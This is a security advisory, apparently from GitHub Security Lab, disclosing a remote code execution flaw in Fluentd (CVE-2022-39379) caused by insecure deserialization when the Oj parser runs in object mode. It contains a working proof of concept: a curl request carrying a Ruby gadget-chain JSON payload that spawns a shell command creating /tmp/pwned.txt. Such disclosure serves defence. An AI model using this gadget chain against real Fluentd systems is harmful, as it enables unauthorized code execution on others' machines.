skip to content
Back to
Home Bounties Research Advisories Get Involved Events
November 17, 2022

GHSL-2022-067: Remote Code Execution (RCE) in Fluentd - CVE-2022-39379

Peter Stöckli

Coordinated Disclosure Timeline


A remote code execution (RCE) vulnerability in non-default configurations of Fluentd allowed unauthenticated attackers to execute arbitrary code via specially crafted JSON payloads.



Tested Version


Issue: Remote code execution due to insecure deserialization (in non-default configuration) (GHSL-2022-067)

Fluentd uses Oj as its JSON parser of choice if it’s installed. Fluentd allows to configure the JSON parsing mode of Oj and explicitly allows to set it to object. When Oj.load is used in the object-mode, arbitrary Ruby objects can be deserialized. Deserializing untrusted data using any method that allows the construction of arbitrary objects is easily exploitable and, in many cases, allows an attacker to execute arbitrary code. So-called “gadget chains” that allow code execution exist for all versions of Ruby.

Important: The default configuration of Fluentd is not vulnerable.

Proof of concept (for Ruby 2.x)


  @type http
  @id http_input
    @type json

  port 8888

After we start Fluentd, it’s now possible to remotely attack it with the following deserialization gadget chain which creates the file /tmp/pwned.txt on the attacked Fluentd system.

curl -X POST -d '{"^#1":[[{"^c":"Gem::SpecFetcher"},{"^c":"Gem::Installer"},{"^o":"Gem::Requirement","requirements":{"^o":"Gem::Package::TarReader","io":{"^o":"Net::BufferedIO","io":{"^o":"Gem::Package::TarReader::Entry","read":0,"header":"any"},"debug_output":{"^o":"Net::WriteAdapter","socket":{"^o":"Gem::RequestSet","sets":{"^o":"Net::WriteAdapter","socket":{"^c":"Kernel"},"method_id":":spawn"},"git_set":"touch /tmp/pwned.txt"},"method_id":":resolve"}}}}],"any"]}' http://localhost:8888/debug.test

Successful exploitation will result in the creation of a /tmp/pwned.txt file on the attacked Fluentd system. (Note that the vulnerability can also be exploited by providing the above JSON based log payload via other interfaces of Fluentd (e.g., via console))

Please note:


This issue may lead to Remote code execution (RCE) if vulnerable configurations are used.



This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).


You can contact the GHSL team at, please include a reference to GHSL-2022-067 in any communication regarding this issue.